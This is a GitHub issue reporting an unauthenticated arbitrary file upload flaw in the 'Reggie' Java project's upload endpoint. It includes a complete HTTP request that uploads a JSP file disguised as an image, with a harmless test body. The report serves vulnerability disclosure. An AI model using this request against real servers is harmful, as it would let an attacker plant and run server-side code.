Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Reggie has any file uploaded #2

Open
LvZCh opened this issue Jan 2, 2025 · 0 comments
Open

Reggie has any file uploaded #2

LvZCh opened this issue Jan 2, 2025 · 0 comments

Comments

@LvZCh
Copy link

LvZCh commented Jan 2, 2025

Vulnerability details:
The upload method in src/main/java/com/itheima/reggie/controller/CommonController.java only performs front-end validation on file suffixes, allowing attackers to directly upload any file
image
No login required, send data packet directly:

POST /common/upload HTTP/1.1
Host: 192.168.0.102:8080
Content-Length: 205
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryceM71QQd51Bajo9H
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryceM71QQd51Bajo9H
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: image/png

<% out.println("test"); %>
------WebKitFormBoundaryceM71QQd51Bajo9H--

image
image
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@LvZCh